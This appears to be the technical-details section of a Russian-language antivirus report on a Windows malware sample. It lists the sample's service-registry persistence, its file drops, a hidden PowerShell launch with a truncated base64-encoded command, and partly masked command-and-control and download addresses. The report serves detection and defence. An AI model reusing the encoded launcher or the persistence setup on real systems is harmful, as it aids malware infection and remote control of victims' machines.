Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\TaskSchdPS] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\TaskSchdPS] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData0009\TaskSchdPS.exe"'
- 'TaskSchdPS' "%WINDIR%\SysWOW64\NlsData0009\TaskSchdPS.exe"
- 'TaskSchdPS' %WINDIR%\SysWOW64\NlsData0009\TaskSchdPS.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAEQASABQAEEAcgBtAHcAPQAnAEEAQwBWAFYAUgBiAHQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAFIAaQBUAHkAYABwAHIAYABvAGAAVABgAE8AQwBPAGwAIgAgAD...
- %HOMEPATH%\893.exe
- %WINDIR%\syswow64\nlsdata0009\taskschdps.exe
- %HOMEPATH%\893.exe в %WINDIR%\syswow64\nlsdata0009\taskschdps.exe
- '14#.#05.151.124':443
- http://mg###ant.com/backup/4l_3pw_nf7ete2ip9/
- http://14#.##5.151.124:443/VamA0rbsrbaWQT/Vhc9CzA/i5MFimPdemlcI/ via 14#.#05.151.124
- DNS ASK mg###ant.com
- '%HOMEPATH%\893.exe'
- '%WINDIR%\syswow64\nlsdata0009\taskschdps.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTAEQASABQAEEAcgBtAHcAPQAnAEEAQwBWAFYAUgBiAHQAbAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAFIAaQBUAHkAYABwAHIAYABvAGAAVABgAE8AQwBPAGwAIgAgAD...' (со скрытым окном)